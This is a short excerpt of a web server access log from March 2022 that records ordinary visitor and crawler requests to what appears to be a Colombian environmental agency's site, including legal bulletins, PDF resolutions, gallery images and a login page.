172.22.2.4 - - [27/Mar/2022:12:32:10 -0500] "GET /BLA/boletinlegal/images/arr_l.jpg HTTP/1.1" 200 1979
172.22.2.4 - - [27/Mar/2022:12:32:10 -0500] "GET /BLA/boletinlegal/images/screen_1.png HTTP/1.1" 200 202547
172.22.2.4 - - [27/Mar/2022:12:32:10 -0500] "GET /BLA/boletinlegal/images/launch.jpg HTTP/1.1" 200 14577
172.22.2.4 - - [27/Mar/2022:12:32:10 -0500] "GET /BLA/boletinlegal/images/screen_2.png HTTP/1.1" 200 362502
172.22.2.4 - - [27/Mar/2022:12:32:10 -0500] "GET /BLA/boletinlegal/images/screen_3.png HTTP/1.1" 200 210620
172.22.2.4 - - [27/Mar/2022:12:32:10 -0500] "GET /BLA/boletinlegal/images/screen_5.png HTTP/1.1" 200 368876
172.22.2.4 - - [27/Mar/2022:12:32:10 -0500] "GET /BLA/boletinlegal/images/arr_r.jpg HTTP/1.1" 200 1998
172.22.2.4 - - [27/Mar/2022:12:32:17 -0500] "GET /BLA/boletinlegal/images/pdf.gif HTTP/1.1" 200 567
216.245.221.92 - - [27/Mar/2022:12:32:20 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [27/Mar/2022:12:31:36 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42131
172.22.2.4 - - [27/Mar/2022:12:32:29 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=1867&usuario=&sector=&fecha=2021&resuelve= HTTP/1.1" 200 1087
186.154.47.187 - - [27/Mar/2022:12:32:49 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/1867.pdf HTTP/1.1" 200 594542
186.154.47.187 - - [27/Mar/2022:12:32:49 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
157.55.39.218 - - [27/Mar/2022:12:32:52 -0500] "GET /bla/resoluciones/autos%202019/4456.pdf HTTP/1.1" 200 280962
201.245.192.253 - - [27/Mar/2022:12:32:09 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 106284
154.21.22.29 - - [27/Mar/2022:12:33:14 -0500] "HEAD HTTP/1.0" 400 226
172.22.2.4 - - [27/Mar/2022:12:32:02 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 61796
172.22.2.4 - - [27/Mar/2022:12:33:19 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [27/Mar/2022:12:34:09 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60932
66.249.73.127 - - [27/Mar/2022:12:36:10 -0500] "-" 408 -
207.46.13.186 - - [27/Mar/2022:12:36:32 -0500] "GET /portaldeninos/wp-content/uploads/2021/11/pieza-semana-ambiental-resultados-7-junio-1024x512.jpg HTTP/1.1" 200 68476
216.245.221.92 - - [27/Mar/2022:12:37:19 -0500] "HEAD / HTTP/1.1" 200 -
191.76.4.224 - - [27/Mar/2022:12:39:46 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
191.76.4.224 - - [27/Mar/2022:12:39:46 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
191.76.4.224 - - [27/Mar/2022:12:39:46 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
191.76.4.224 - - [27/Mar/2022:12:39:48 -0500] "GET /galeria/carrusel/Carrusel/jquery.thumbnailScroller.css HTTP/1.1" 200 2066
191.76.4.224 - - [27/Mar/2022:12:39:49 -0500] "GET /galeria/carrusel/Carrusel/jquery-ui-1.8.13.custom.min.js HTTP/1.1" 200 10800
191.76.4.224 - - [27/Mar/2022:12:39:49 -0500] "GET /galeria/carrusel/Carrusel/jquery.thumbnailScroller.js HTTP/1.1" 200 8157
191.76.4.224 - - [27/Mar/2022:12:39:49 -0500] "GET /galeria/nivo-slider/demo/banner.html HTTP/1.1" 200 5446
191.76.4.224 - - [27/Mar/2022:12:39:50 -0500] "GET /galeria/nivo-slider/themes/default/default.css HTTP/1.1" 200 1569
191.76.4.224 - - [27/Mar/2022:12:39:50 -0500] "GET /galeria/nivo-slider/themes/pascal/pascal.css HTTP/1.1" 200 2258
191.76.4.224 - - [27/Mar/2022:12:39:50 -0500] "GET /galeria/nivo-slider/themes/orman/orman.css HTTP/1.1" 200 2152
191.76.4.224 - - [27/Mar/2022:12:39:51 -0500] "GET /galeria/nivo-slider/nivo-slider.css HTTP/1.1" 200 1507
191.76.4.224 - - [27/Mar/2022:12:39:51 -0500] "GET /galeria/nivo-slider/demo/style.css HTTP/1.1" 200 2222
191.76.4.224 - - [27/Mar/2022:12:39:51 -0500] "GET /galeria/nivo-slider/demo/scripts/jquery-1.7.1.min.js HTTP/1.1" 200 93868
191.76.4.224 - - [27/Mar/2022:12:39:51 -0500] "GET /galeria/nivo-slider/demo/images/bannertortuga_optimized.jpg HTTP/1.1" 200 39066
191.76.4.224 - - [27/Mar/2022:12:39:51 -0500] "GET /galeria/nivo-slider/jquery.nivo.slider.pack.js HTTP/1.1" 200 11561
191.76.4.224 - - [27/Mar/2022:12:39:51 -0500] "GET /galeria/nivo-slider/demo/images/Bannermujeresquereverdecen.jpg HTTP/1.1" 200 46558
191.76.4.224 - - [27/Mar/2022:12:39:51 -0500] "GET /galeria/nivo-slider/demo/images/bannertrafico_optimized.jpg HTTP/1.1" 200 42578
191.76.4.224 - - [27/Mar/2022:12:39:54 -0500] "GET /galeria/nivo-slider/demo/images/4Simple_Slider.png HTTP/1.1" 200 11722
191.76.4.224 - - [27/Mar/2022:12:39:54 -0500] "GET /galeria/nivo-slider/themes/default/loading.gif HTTP/1.1" 200 1737
191.76.4.224 - - [27/Mar/2022:12:39:56 -0500] "GET /galeria/nivo-slider/demo/images/Bannersedeelectronica.jpg HTTP/1.1" 200 40383
191.76.4.224 - - [27/Mar/2022:12:39:57 -0500] "GET /galeria/nivo-slider/demo/images/bannerrutaesperanza.jpg HTTP/1.1" 200 55560
191.76.4.224 - - [27/Mar/2022:12:39:57 -0500] "GET /galeria/nivo-slider/demo/images/banneraire2021.jpg HTTP/1.1" 200 265101
191.76.4.224 - - [27/Mar/2022:12:39:57 -0500] "GET /galeria/nivo-slider/demo/images/Bannerplasticosseptiembre.jpg HTTP/1.1" 200 45633
191.76.4.224 - - [27/Mar/2022:12:39:57 -0500] "GET /galeria/nivo-slider/demo/images/bannerresiduoshospitalariosagosto.jpg HTTP/1.1" 200 36499
191.76.4.224 - - [27/Mar/2022:12:39:57 -0500] "GET /galeria/nivo-slider/demo/images/banneraccionpopularcrr68.jpg HTTP/1.1" 200 51887
191.76.4.224 - - [27/Mar/2022:12:39:58 -0500] "GET /galeria/nivo-slider/demo/images/banneraccionpopular.jpeg HTTP/1.1" 200 41707
191.76.4.224 - - [27/Mar/2022:12:39:58 -0500] "GET /galeria/nivo-slider/demo/images/bannerclases2021.jpg HTTP/1.1" 200 68230
191.76.4.224 - - [27/Mar/2022:12:39:59 -0500] "GET /galeria/nivo-slider/demo/images/bannercapacitacionesbogota.jpg HTTP/1.1" 200 42416
191.76.4.224 - - [27/Mar/2022:12:40:00 -0500] "GET /galeria/nivo-slider/demo/images/Bannerenvases.jpg HTTP/1.1" 200 37316
172.22.2.4 - - [27/Mar/2022:12:39:09 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [27/Mar/2022:12:40:46 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44550
172.22.2.4 - - [27/Mar/2022:12:39:59 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52945
201.245.192.253 - - [27/Mar/2022:12:41:31 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42131
216.245.221.92 - - [27/Mar/2022:12:42:20 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [27/Mar/2022:12:41:46 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 106284
66.249.73.127 - - [27/Mar/2022:12:44:53 -0500] "-" 408 -
172.22.2.4 - - [27/Mar/2022:12:44:59 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
157.55.39.218 - - [27/Mar/2022:12:46:44 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2021%2F HTTP/1.1" 200 299140
216.245.221.92 - - [27/Mar/2022:12:47:20 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [27/Mar/2022:12:45:49 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59170
207.46.13.209 - - [27/Mar/2022:12:48:28 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202006/0924.tif HTTP/1.1" 200 796406
49.7.21.74 - - [27/Mar/2022:12:49:09 -0500] "-" 408 -
186.30.67.90 - - [27/Mar/2022:12:50:38 -0500] "GET /sipse/faces/faces/faces/faces/faces/index.xhtml HTTP/1.1" 200 677
186.30.67.90 - - [27/Mar/2022:12:50:38 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.30.67.90 - - [27/Mar/2022:12:50:38 -0500] "GET /sipse/faces/faces/faces/faces/faces/faces/autenticacion.xhtml HTTP/1.1" 200 12179
186.30.67.90 - - [27/Mar/2022:12:50:38 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.30.67.90 - - [27/Mar/2022:12:50:38 -0500] "GET /sipse/css/custom_css_sg.css HTTP/1.1" 304 -
